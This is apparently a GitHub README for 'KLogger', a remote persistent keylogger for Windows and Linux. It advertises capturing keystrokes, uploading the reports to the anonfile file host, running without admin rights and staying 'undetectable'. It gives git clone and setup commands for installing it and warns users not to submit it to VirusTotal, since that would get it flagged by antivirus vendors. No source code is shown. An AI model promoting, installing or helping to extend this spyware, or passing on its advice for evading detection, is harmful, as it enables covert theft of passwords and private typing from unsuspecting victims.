
Remote persistent 🔑Logger for Windows and Linux

Primary LanguagePython

K🔑Logger v3.0.0


Remote persistent 🔑Logger for Windows and Linux


  • Logs keys pressed on keyboard
  • upload reports in anonfile.
  • Works with Linux and Windows.
  • Does not require root or admin privlages.

All previous problems have been resolved

It is still undetectable


  • python >= 3.8 ++ Download Python
  • os : Windows
  • os : Linux

Installation to Windows:

git clone https://github.com/De3vil/KLogger.git
cd KLogger
pip install -r win_requirements.txt
python logger.py

Installation to Linux

git clone https://github.com/De3vil/KLogger.git
cd KLogger
chmod +x linux_setup.sh
bash linux_setup.sh
python logger.py


* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!

AV detection

Abdulrahman Mohammed

If this tool has been useful for you, feel free to thank me by buying me a coffee :) Coffee B De3vil